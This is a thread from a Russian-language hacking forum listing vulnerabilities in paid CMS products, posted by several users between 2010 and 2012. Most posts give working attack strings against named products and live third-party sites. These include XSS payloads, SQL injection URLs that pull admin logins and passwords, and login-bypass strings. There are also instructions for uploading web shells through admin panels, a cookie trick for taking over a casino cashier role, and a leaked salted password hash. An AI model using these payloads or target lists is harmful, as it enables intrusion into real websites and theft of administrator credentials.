Обзор уязвимостей в платных CMS

Discussion in 'Веб-уязвимости' started by Roba, 10 Jan 2008.

  1. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    OMECO®webshop 4.0


    BLIND SQL INJECTION

    Пример:
    Result:
    Code:
    [COLOR=White]Duplicate entry '[B]4.1.221[/B]' for key 1[SIZE=4][/COLOR]

    SQL INJECTION AUTHORIZATION BYPASS
    [/SIZE]

    Ihr Login: ' or 1=1# 1
    Passwort: ' or 1=1# 1



    Активная xss


    При регистрации почти все поля уязвимы
    вписуем
    Code:
    <script>document.body.innerHTML ="<style>body{ visibility:hidden; }</style><div style =visibility:visible;><img src= https://forum.antichat.ru/antichat/pic/logo.gif></img></div></script>
    или что-то другое

    OMECO®webcontent CMS

    Пассивная xss:
    http://www.omeco.de/
    В Поиске: "><script>alert(xss)</script>
     
  2. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    SiteYouSelf CMS
    Офф сайт: http://www.siteyourself.de/

    xss inj.
    Code:
    http://www.siteyourself.de/start.php?sys_suche=aa"><script>alert(document.cookie)</script>&Button.x=19&Button.y=15&seitenid=43&seiteninhaltid=69&langid=1
    Путь:
    http://www.siteyourself.de/start.php?sys_suche=&Button.x=19&Button.y=15&seitenid=43&seiteninhaltid=-69
     
    #62 Дирижабль, 27 Oct 2010
    Last edited: 27 Oct 2010
    1 person likes this.
  3. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Web2Date v7.0

    off site: http://www.databecker.de/ 178,50 EUR
     
    #63 Дирижабль, 29 Oct 2010
    Last edited: 29 Oct 2010
    4 people like this.
  4. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Xitex WebContent M1 CMS
    Платна
    офф сайт: http://webcontent-m1.com/

    Passive XSS
    Code:
    http://webcontent-m1.com/m1/en/buyonline/standard_vs_professional
    В поле:
    Sign up for free e-newsletter XSS
    Please correct you e-mail address
    E-mail: </script><script>alert('xss')</script>
    ____
    Code:
    http://webcontent-m1.com/m1/en/buyonline/trial_version
    http://webcontent-m1.com/m1/en/contact_us
    http://webcontent-m1.com/m1/en/buyonline/overview
    http://webcontent-m1.com/m1/en/send_feedback
    Нужно минимум 2 поля заполнить хсс кодом.
    "><script>alert(document.cookie)</script>

    также фильтра нету никакого т.е можно все заполнить кавычками.
     
    #64 Дирижабль, 30 Nov 2010
    Last edited: 30 Nov 2010
    4 people like this.
  5. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    JobExpert
    http://jobexpert.sd-group.org.ua/

    XSS

    Уязвим параметр currency
    Code:
    http://jobexpert.sd-group.org.ua/index.php?ut=competitor&do=search&q=xss&base=vacancy&type=any&id_section=1&id_profession=1t&id_region=1&id_city=1&pay_from=1&currency=<script>alert('d0s')</script>&period=0&records=10
    

     
  6. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    CMS.SSPRO
    http://www.sspro.ru/

    XSS
    Code:
    http://www.demo.sspro-soft.ru/?pgid=1&mod=1<script>alert(123)</script>
    

     
  7. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    IBPRO CMS
    http://cms.ibpro.com.ua/

    XSS
    Code:
    http://cms.ibpro.com.ua/search/?qs=</script><script>alert('d0s')</script>
    

     
  8. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    OSG WebShop
    офф сайт: http://www.osg.ru/

    Xss

    Code:
    http://www.demo.osg.ru/forum.html
    Вбиваем "><script>alert('ded-m0r0z')</script>
    Уязвимые поля:
    Code:
    Ваше имя
    Ваш e-mail
    Ваш адрес в Internet
    ну и гет запрос будет примерно таким:
    Code:
    http://www.demo.osg.ru/forum.html?idc=0&stype=0&pgn=1&idbook=97&idmain=0&idmess=0&rnd=14613&pgn=1&s_cf=28%2E50&s_ch=6A675D26682717306851D40C1878BD14&gbmess=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r0z%27%29%3C%2Fscript%3E&idbook=97&gbwww=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r
    
     
  9. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    NReco.Site CMS
    офф сайт: nrecosite.com

    XSS

    Пишем в поиск:
    Code:
    <script>alert('ololo')</script>
    Гет запрос такой будет:
    Code:
    http://www.nrecosite.com/search.aspx/ru?q=<script>alert('ololo')</script>
     
    #69 ~d0s~, 18 Dec 2010
    Last edited: 19 Dec 2010
    1 person likes this.
  10. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Заливка шелла в Shop-Script PREMIUM. Нужны права Админа.
    Админка по умолчании расположена в site.com/admin.php
    Заходим в Каталог->Категории и товары->Добавить новый товар. В появившемся окне заполняем форму, как угодно, и главный момент это, ставим галочку на чекбоксе Продукт является программой и заливаем пустой .htaccess дабы переписать существующий .htaccess в папке куда далее зальем наш web-shell.
    Повторяем процедуру и уже заливаем шелл.
    Шелл заливается в папку : site.com/products_files/ имя загружаемого файла не изменяется.
     
  11. Jаger

    Jаger Banned

    Joined:
    26 Mar 2011
    Messages:
    7
    Likes Received:
    12
    Reputations:
    10
    Zikula CMS Version 1
    pXSS:
    • zikula.de
    • /index.php
    • http://demo.zikula.de/index.php?module=benutzer&func="></div><script>alert('xss')</script>
     
    #71 Jаger, 20 Apr 2011
    Last edited: 20 Apr 2011
  12. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    bcms, быстро cms
    офф сайт: http://www.bistro-site.ru/
    их хостинг: http://www.bistro-host.ru/

    вообще это вебдизовая студия, но у них свой платный двиг.

    На большинстве сайтов на странице с новостями.
    MySQL inj
    Code:
    http://www.linefirm.ru/news/text?newsid=-6+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7+from+b_admin--
    
    админка: /badmin
    Имеется cpanel у сайтов на их хостинге.

    Зайдя в диры, можно посмотреть содержимое папок у большинства сайтов(в приведённом мною так не попасть):
    /bfiles, /bsystem
    в /bfiles складируются любые файлы через админку, но на некоторых сайтах стоят права ток на чтение из этой папки.

    на старых версиях двига юзается md5 для хэша, на новых - так и не подобрал(хорошо бы, если и мне скажете, если подберёте)).
     
    #72 Melfis, 27 Apr 2011
    Last edited: 28 Apr 2011
    2 people like this.
  13. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    1) Дата: 25.08.2011

    2) Продукт: Официальный сайт . Версия - не известна. StewieEngine Framework

    3) Уязвимость: XSS

    4) Автор: Фараон

    5) Тип: удалённая

    6) Опасность: 3

    7) Описание: XSS и этим все сказано. Код отсутствует так как cms платная.

    8) Эксплоит: http://www.sibcontact.ru/admin/login.php?back="><script>document.write('<h1>LOL</h1>');</script>

    9) Решение: htmlspecialchars($_GET[back]);
     
    1 person likes this.
  14. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    NetCat CMS


    Уязвимость: Множественное раскрытие путей
    Примеры:
    /netcat/modules/calendar/showpreview.php?id=-1 (требует прав админа)
    /netcat/full.php?classPreview=1

    Уязвимость: Инлуд (раскрутить нельзя :( )
    Примеры:
    /netcat/modules/netshop/post.php?system=bank (bank - имя скрипта находящегося в каталоге /netcat/modules/netshop/payment)

    З.Ы. Все вышеописанные уязвимости присутствуют на офф. сайте - netcat.ru
     
    _________________________
  15. mr.Penguin

    mr.Penguin Member

    Joined:
    8 Mar 2012
    Messages:
    40
    Likes Received:
    37
    Reputations:
    74
    KASSELER CMS
    Официальный сайт: kasseler-cms.net

    Версия: 2.2 (последняя на данный момент)
    Уязвимость: Активная XSS
    Уязвимый параметр: user_gtalk

    POST:
    Code:
    www.site.com/account/save_controls.html?days=00&months=0&years=00&user_gender=0&user_occupation=&user_interests&user_locality=&user_locality_hk=&user_signature=&language=russian&template=kasseler2&user_gmt=4&hide_user_viewemail=set&hide_user_pm_send=set&user_pm_send=on&hide_user_new_pm_window=set&user_new_pm_window=on&user_email=Ваш[email protected]&user_icq=&user_aim=&user_yim=&user_msnm=&user_skype=&user_gtalk=<script>alert('XSS by Mr. Penguin')</script>&user_website=http://&set_avatar=&avatar=animation&userfile=&user_password=&user_password_hk&user_newpassword=&user_newpassword_hk=&user_renewpassword=&user_renewpassword_hk=&hide_user_forum_mail=set&cmd_forum_mail=0
    PoC:
    Code:
    http://kasseler-cms.net/account/save_controls.html?days=00&months=0&years=00&user_gender=0&user_occupation=&user_interests&user_locality=&user_locality_hk=&user_signature=&language=russian&template=kasseler2&user_gmt=4&hide_user_viewemail=set&hide_user_pm_send=set&user_pm_send=on&hide_user_new_pm_window=set&user_new_pm_window=on&user_email=Ваш[email protected]&user_icq=&user_aim=&user_yim=&user_msnm=&user_skype=&user_gtalk=<script>alert('XSS by Mr. Penguin')</script>&user_website=http://&set_avatar=&avatar=animation&userfile=&user_password=&user_password_hk&user_newpassword=&user_newpassword_hk=&user_renewpassword=&user_renewpassword_hk=&hide_user_forum_mail=set&cmd_forum_mail=0
     
    #75 mr.Penguin, 29 Mar 2012
    Last edited: 29 Mar 2012
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    ZRP CMS Sql-injection

    Уязвимость платного ZRP CMS, в файле addbasket.php, в параметре dataID, что позволяет внедрять sql-команды.
    Exploit:
    Code:
    addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
    Примеры:
    Code:
    http://www.photo[google]festival.info/addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
    http://www.elex[google]pro.ru/addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
    http://www.plw[google]ha.kz/addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
    
    Админка по адресу /zrp_admin/. Много раскрытии путей... В админке, мягко говоря, п****ц, везде скульи.

    Оригинал поста в моем блоге , здесь:
    http://dbitems.ru/blog/?x=entry:entry120405-142125
     
    3 people like this.
  17. Datax

    Datax Banned

    Joined:
    3 Nov 2011
    Messages:
    0
    Likes Received:
    4
    Reputations:
    0
    Движок HLSTATX

    exploit

    Код:
    host/ingame.php?mode=pro ./avatar.jpg


    CMS казино


    Стать кассиром передав в качестве Cookie username="любое кышы кышы"

    Все данные хранятся в не зашифрованном виде.

    XSS

    kasa/stat.php?user=[xss]

    rg=on
    kasa/stat2.php?user=[xss]
     
  18. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Smart-CMS

    Уязвимость: SQL-Injection
    http://www.site.com/program/link.php?act=list&id=[SQLi]

    Уязвимость
    : XSS-Active
    http://www.site.com/program/register.php
    Поля: "User name", "Reporter name".

    http://1337day.com/exploits/19051
     
    #78 mix0x0, 22 Jul 2012
    Last edited: 10 Aug 2012
    1 person likes this.
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Множественные уязвимости в Budhae CMS

    Нашёл - BigBear

    URL разработчика - www.asuhanov.com/ourcms.php

    demo - _ttp://demo.budhaecms.ru/budhae/index.php

    Active XSS при добавлении/просмотре пользователя

    Уязвимый код

    /mods/component_user/add_user.php

    Code:
    if ($_POST['process']==1)
    		{
    				[COLOR=Magenta]$ADDUSER['login']=$_POST['login'];[/COLOR]
    				[COLOR=Magenta]$ADDUSER['fullname']=$_POST['fullname'];[/COLOR]
    				$ADDUSER['types']=$_POST['types'];
    				
    				$ADDUSER['pass']=$_POST['pass'];
    				$ADDUSER['confirm']=$_POST['confirm'];				
    						if ($_POST['pass']==$_POST['confirm']){
    								if ($SID->NewUser($ADDUSER)==1){echo ShowMessage('Пользователь добавлен',1);}else{echo ShowMessage('Такой пользователь уже существует',0);}
    								echo ShowMessage('Пароли не совпадают',0);							
    						}else{
    							echo ShowMessage('Пароли не совпадают',0);					
    						}
    		}
    /mods/component_user/list_user.php

    Code:
    $USERS = $SID->GetListOfUser();
    	$PRNUSER='';
    	for ($i=0;$i<sizeof($USERS);$i++)
    		{
    			$PRNUSER.='<strong>Пользователь: </strong>'.[COLOR=Magenta]$USERS[$i]["budhae_login"].' ('.$USERS[$i]["budhae_fullname"][/COLOR].') - <strong>'.$USERS[$i]["budhae_type"].'</strong> - <img src="images/sm_icon1.jpg" width="25" height="23"><a href="'.$ColLines[$LatestLines].'?mode=edituser&sid='.$USERS[$i]["unique"].'" id="inside_blue_links">Редактировать</a> <img src="images/sm_icon2.jpg" width="25" height="23"><a href="'.$ColLines[$LatestLines].'?mode=delete&u='.$USERS[$i]["unique"].'" id="inside_blue_links">Удалить</a><br>';		
    		}
    Вектор атаки - добавляем пользователя в админке http://site/admin/b_users.php

    Login = <script>alert(1234)</script>
    ФИО = <script>alert(12345)</script>


    Active XSS
    при редактировании карты сайта

    Уязвимый код

    /classes/budhae_webpage.php

    Code:
    function AddNewPages($INFO){
    				
    		include_once ("sql.php");
    		$execute2 = new DBConnect;
    		$execute2->Connect();
    		$SQL="INSERT INTO `webpages` (`name`,`url`,`type`) VALUES ('"[COLOR=Magenta].$INFO["name"]."','".$INFO["url"][/COLOR]."','".$INFO["type"]."');";
    		$dump = $execute2->Query($SQL);
    		$execute2->Close();
    					
    ...
    					
    function GetAllPages(){
    					
    		include_once ("sql.php");
    		$execute = new DBConnect;
    		$execute->Connect();
    		$SQL="SELECT * FROM `webpages`";
    		$dump = $execute->Query($SQL);
    		$Count=0;
    		while ($row=mysql_fetch_array($dump)){
    			$SID[$Count]['id']=$row['id'];
    			[COLOR=Magenta]$SID[$Count]['name']=$row['name'];[/COLOR]
    			[COLOR=Magenta]$SID[$Count]['url']=$row['url'];[/COLOR]
    			$SID[$Count]['type']=$row['type'];
    			$Count++;
      			 };
    										 $execute->Close();
    										 return $SID;						
    					
    					}
    Вектор атаки

    Добавляем новую страницу http://site/admin/b_weburl.php?mode=add&step=1

    Название = <scipt>alert(100)</script>
    URL = <script>alert(200)</script>


    Active XSS при добавлении фото

    Уязвимый код

    /classes/budhae_gallery.php

    Code:
    function AddGallery($name,$gid,$tn)
                 {
    	            include_once ("sql.php");
    	            $execute2 = new DBConnect;
    	            $execute2->Connect();
    				$TableName='bd_'.$gid.'_galleryname';
    				
                    $SQL="INSERT INTO `".$TableName."` (`gnames`,`description1`) VALUES ('".[COLOR=Magenta]$name[/COLOR]."','".$tn."');";
                    $dump = $execute2->Query($SQL);
    				
    				
    				
    	            $execute2->Close();
                 }
    					
    ...
    					
    function GetAllGallery()
    		{
    		include_once ("sql.php");
    		$execute = new DBConnect;
    		$execute->Connect();
    		$SQL="SELECT * FROM `gallery_table`";
    		$dump = $execute->Query($SQL);
    		$Count=0;
    		while ($row=mysql_fetch_array($dump)){
    				$SID[$Count]['id']=$row['id'];
    				[COLOR=Magenta]$SID[$Count]['name']=$row['name'];[/COLOR]
    				$SID[$Count]['idgallery']=$row['idgallery'];
    				$Count++;
    		 };
    Вектор атаки

    Добавляем новую галлерею http://site/admin/b_gallery.php?gid=&method=add

    Название галереи = <scipt>alert(100)</script>


    SQL-Injection при просмотре "Типа Новостей"

    Уязвимый код

    /classes/budhae_cats.php

    Code:
    function GetPageNameById($id,$gid){
    
                     $execute = new DBConnect;
                     $execute->Connect();
    				 $TableName='bd_'.$gid.'_list';
                    [COLOR=Magenta] $SQL="SELECT * FROM `".$TableName."` WHERE  `id`=".$id." ORDER BY `show` ASC";[/COLOR]
                     $dump = $execute->Query($SQL);
    	                while ($row=mysql_fetch_array($dump)){
        	                  $datetotal = $row['name'];
            	     	 };
                     $execute->Close();
                     return $datetotal;
    				 
    
    			}
    Exploit

    http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1+group+by+3

    http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1+union+select+1,@@version,3


    SQL-Injection при просмотре "Фотоальбома"

    Уязвимый код

    /classes/budhae_cats.php

    Code:
    function  GetPageNameById($id,$gid){
                    include_once ("sql.php");
                    $execute = new DBConnect;
                    $execute->Connect();
    				
    				$TableName='bd_'.$gid.'_galleryname';
    				
    				[COLOR=Magenta]$SQL = "SELECT * FROM `".$TableName."` WHERE `id` =".$id;[/COLOR]
                    $dump = $execute->Query($SQL);
                     while ($row=mysql_fetch_array($dump)){
                    $SName = $row['gnames'];
                    	 };
                    $execute->Close();
                    return $SName;
                }
    Exploit

    http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1+group+by+7

    http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1+union+select+1,@@version,3,4,5,6,7


    ByPass Authentication

    Уязвимый код


    /classes/budhae_user.php

    Code:
    function UserLogin($USERID){		
    				 $USERID['login']=strtolower($USERID['login']);
    			     include_once ("sql.php");
                     $execute = new DBConnect;
                     $execute->Connect();
    				 [COLOR=Magenta]$SQL="SELECT * FROM users WHERE `login`='".$USERID['login']."' AND `password` ='".$USERID['password']."' LIMIT 1;";[/COLOR]
                     $dump = $execute->Query($SQL);
                     $row=mysql_fetch_array($dump);			 
                                       @session_start();								   
    				   $_SESSION['budhae_login']=$row['login'];
    				   $_SESSION['budhae_password']=$row['password'];
    				   $_SESSION['budhae_type']=$row['type'];
    				   $_SESSION['budhae_fullname']=$row['fullname'];
    				   $_SESSION['budhae_date']=$row['date'];							     
    				   $_SESSION['budhae_status']='approved';
    				   $_SESSION['unique']=$row['unique'];;
                                       return session_id();    			 		
    				$execute->Close();	
    		}
    Exploit

    http://site/admin/index.php

    login= 1' or 1='1
    pass = 1' or 1='1


    Раскрытие путей при любом обращении к файлам в /mods

    _ttp://site/admin/mods/component_ftp/companent_main.php

    _ttp://site/admin/mods/component_detect_cats.php


    Code:
    Fatal error: Class 'Files' not found in /var/www/clients/client11/web106/web/demo/budhae/mods/component_ftp/companent_main.php on line 3
    Code:
    Fatal error: Class 'Components' not found in /var/www/clients/client11/web106/web/demo/budhae/mods/component_detect_cats.php on line 7
    Заливка шелла

    _ttp://site/admin/filecomponent.php

    Загружаемые расширения не фильтруются ---> shell.php

    P.S. Очень дырявый и бажный движок. Перед покупкой 100 раз подумайте !!!

    PoC: http://ioanidi.com/admins/
     
    _________________________
    #79 BigBear, 6 Oct 2012
    Last edited: 6 Oct 2012
    4 people like this.
  20. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    CMS alfasfera.com
    Уязвимости к CMS этой веб-студии.

    SQL Injection (POST method)

    Идем на страницу восстановления пароля:

    Code:
    [COLOR=red]/page/new_pass/[/COLOR]
    Вставляем в поле E-Mail SQL запрос.

    Панель админ-авторизации: /admin


    Примеры уязвимых сайтов:

    Уязвимые сайты найти можно у них в портфолио, вот два примера.

    _ttp://imprus.su - Онлайн игра
    _ttp://antipedofil.org - Оккупай-Педофиляй ит.д.


    Хэширование пароля

    Пароль хэшируется в MD5 с добавлением соли.

    Code:
    [COLOR=Red]497911ed40a7e76681c5e93113f9e4a1:tt-[/COLOR]
    Этот хэш присутствует на всех сайтах, так что это тоже можно считать уязвимостью.

    Найдено мною
     
    1 person likes this.